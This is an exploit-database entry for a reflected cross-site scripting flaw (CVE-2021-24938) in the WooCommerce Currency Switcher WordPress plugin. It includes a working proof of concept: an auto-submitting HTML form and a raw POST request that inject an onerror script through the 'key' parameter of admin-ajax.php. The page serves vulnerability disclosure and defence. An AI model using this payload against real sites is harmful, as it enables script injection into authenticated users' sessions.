Lucene search
+L

WooCommerce Currency Switcher < 1.3.7.1 - Reflected Cross-Site Scripting

🗓️ 08 Nov 2021 00:00:00Reported by JrXnmType 
wpexploit
 wpexploit
👁 429 Views

WooCommerce Currency Switcher version < 1.3.7.1 allows reflected cross-site scripting via the 'key' parameter in wp-admin/admin-ajax.ph

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-24938
6 Dec 202116:15
attackerkb
circl
Circl
CVE-2021-24938
6 Dec 202118:20
circl
cnnvd
CNNVD
WordPress 插件跨站脚本漏洞
6 Dec 202100:00
cnnvd
cnvd
CNVD
WordPress WOOCS plugin cross-site scripting vulnerability
9 Dec 202100:00
cnvd
cve
CVE
CVE-2021-24938
6 Dec 202115:55
cve
cvelist
Cvelist
CVE-2021-24938 WooCommerce Currency Switcher < 1.3.7.1 - Reflected Cross-Site Scripting
6 Dec 202115:55
cvelist
euvd
EUVD
EUVD-2021-11850
7 Oct 202500:30
euvd
nvd
NVD
CVE-2021-24938
6 Dec 202116:15
nvd
osv
OSV
CVE-2021-24938
6 Dec 202116:15
osv
patchstack
Patchstack
WordPress WOOCS – Currency Switcher for WooCommerce plugin <= 1.3.7 - Reflected Cross-Site Scripting (XSS) vulnerability
8 Nov 202100:00
patchstack
Rows per page
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
        <input type="hidden" name="action" value="woocs_update_profiles_data" />
        <input type="hidden" name="key" value="<img src onerror=alert(`XSS`) >" />
        <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
Connection: close
Cookie: [any authenticated user]
Cache-Control: max-age=0

action=woocs_update_profiles_data&key=%3Cimg+src+onerror%3Dalert%28%60XSS%60%29%3E

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2021 07:42Current
6Medium risk
Vulners AI Score6
CVSS 24.3
CVSS 3.16.1
EPSS0.00795
429